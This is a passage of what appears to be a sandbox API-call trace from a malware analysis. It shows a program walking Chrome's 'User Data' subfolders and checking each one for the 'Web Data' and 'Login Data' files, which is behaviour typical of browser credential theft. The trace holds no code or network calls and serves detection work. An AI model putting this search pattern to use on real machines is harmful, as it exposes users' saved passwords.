lpFileInformation=0x288bb4 | out: lpFileInformation=0x288bb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0088.591] GetLastError () returned 0x2 [0088.591] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x288be8 | out: lpFileSizeHigh=0x288be8*=0x0) returned 0x4800 [0088.591] ReadFile (in: hFile=0x10c, lpBuffer=0x3ebe3c, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x288bc8, lpOverlapped=0x0 | out: lpBuffer=0x3ebe3c*, lpNumberOfBytesRead=0x288bc8*=0x800, lpOverlapped=0x0) returned 1 [0088.591] UnlockFile (hFile=0x10c, dwFileOffsetLow=0x40000002, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.596] CloseHandle (hObject=0x10c) returned 1 [0088.596] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.596] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.596] wcslen (_String="EVWhitelist") returned 0xb [0088.596] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.596] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.596] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.596] wcscat (in: _Dest=0x28b454, _Source="EVWhitelist" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" [0088.597] wcscmp (_String1="EVWhitelist", _String2="..") returned 1 [0088.597] wcscmp (_String1="EVWhitelist", _String2=".") returned 1 [0088.597] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 0x4a [0088.597] wcslen (_String="Web Data") returned 0x8 [0088.597] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" [0088.597] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 0x4a [0088.597] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\" [0088.597] wcscat (in: _Dest=0x28ad50, _Source="Web Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Web Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Web Data" [0088.597] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\web data")) returned 0xffffffff [0088.597] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 0x4a [0088.597] wcslen (_String="Login Data") returned 0xa [0088.597] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" [0088.597] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 0x4a [0088.597] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\" [0088.597] wcscat (in: _Dest=0x28ad50, _Source="Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Login Data" [0088.597] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\login data")) returned 0xffffffff [0088.597] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.597] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.597] wcslen (_String="FileTypePolicies") returned 0x10 [0088.597] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.597] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.597] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.598] wcscat (in: _Dest=0x28b454, _Source="FileTypePolicies" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" [0088.598] wcscmp (_String1="FileTypePolicies", _String2="..") returned 1 [0088.598] wcscmp (_String1="FileTypePolicies", _String2=".") returned 1 [0088.598] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 0x4f [0088.598] wcslen (_String="Web Data") returned 0x8 [0088.598] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" [0088.598] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 0x4f [0088.598] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\" [0088.598] wcscat (in: _Dest=0x28ad50, _Source="Web Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Web Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Web Data" [0088.598] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\web data")) returned 0xffffffff [0088.598] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 0x4f [0088.598] wcslen (_String="Login Data") returned 0xa [0088.598] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" [0088.598] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 0x4f [0088.598] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\" [0088.598] wcscat (in: _Dest=0x28ad50, _Source="Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Login Data" [0088.598] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\login data")) returned 0xffffffff [0088.598] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.598] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.598] wcslen (_String="First Run") returned 0x9 [0088.598] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.598] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.598] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.598] wcscat (in: _Dest=0x28b454, _Source="First Run" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\First Run") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\First Run" [0088.598] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.598] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.598] wcslen (_String="Local State") returned 0xb [0088.598] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.598] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.598] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.598] wcscat (in: _Dest=0x28b454, _Source="Local State" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" [0088.598] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.598] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.598] wcslen (_String="OriginTrials") returned 0xc [0088.598] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.598] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.598] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.598] wcscat (in: _Dest=0x28b454, _Source="OriginTrials" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" [0088.598] wcscmp (_String1="OriginTrials", _String2="..") returned 1 [0088.598] wcscmp (_String1="OriginTrials", _String2=".") returned 1 [0088.598] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 0x4b [0088.598] wcslen (_String="Web Data") returned 0x8 [0088.599] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" [0088.599] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 0x4b [0088.599] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\" [0088.599] wcscat (in: _Dest=0x28ad50, _Source="Web Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Web Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Web Data" [0088.599] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\origintrials\\web data")) returned 0xffffffff [0088.599] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 0x4b [0088.599] wcslen (_String="Login Data") returned 0xa [0088.599] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" [0088.599] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 0x4b [0088.599] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\" [0088.599] wcscat (in: _Dest=0x28ad50, _Source="Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Login Data" [0088.599] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\origintrials\\login data")) returned 0xffffffff [0088.599] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.599] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.599] wcslen (_String="PepperFlash") returned 0xb [0088.599] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.599] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.599] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.599] wcscat (in: _Dest=0x28b454, _Source="PepperFlash" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" [0088.599] wcscmp (_String1="PepperFlash", _String2="..") returned 1 [0088.599] wcscmp (_String1="PepperFlash", _String2=".") returned 1 [0088.599] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 0x4a [0088.599] wcslen (_String="Web Data") returned 0x8 [0088.599] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" [0088.599] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 0x4a [0088.599] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\" [0088.599] wcscat (in: _Dest=0x28ad50, _Source="Web Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Web Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Web Data" [0088.599] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\pepperflash\\web data")) returned 0xffffffff [0088.599] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 0x4a [0088.599] wcslen (_String="Login Data") returned 0xa [0088.599] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" [0088.600] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 0x4a [0088.600] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\" [0088.600] wcscat (in: _Dest=0x28ad50, _Source="Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Login Data" [0088.600] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\pepperflash\\login data")) returned 0xffffffff [0088.600] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.600] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.600] wcslen (_String="pnacl") returned 0x5 [0088.600] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.600] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.600] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.600] wcscat (in: _Dest=0x28b454, _Source="pnacl" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" [0088.600] wcscmp (_String1="pnacl", _String2="..") returned 1 [0088.600] wcscmp (_String1="pnacl", _String2=".") returned 1 [0088.600] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 0x44 [0088.600] wcslen (_String="Web Data") returned 0x8 [0088.600] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" [0088.600] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 0x44 [0088.600] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\" [0088.600] wcscat (in: _Dest=0x28ad50, _Source="Web Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Web Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Web Data" [0088.600] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\pnacl\\web data")) returned 0xffffffff [0088.602] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 0x44 [0088.602] wcslen (_String="Login Data") returned 0xa [0088.602] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" [0088.602] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 0x44 [0088.602] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\" [0088.602] wcscat (in: _Dest=0x28ad50, _Source="Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Login Data" [0088.602] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\pnacl\\login data")) returned 0xffffffff [0088.602] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.602] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.602] wcslen (_String="Safe Browsing Channel IDs") returned 0x19 [0088.602] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.602] wcslen 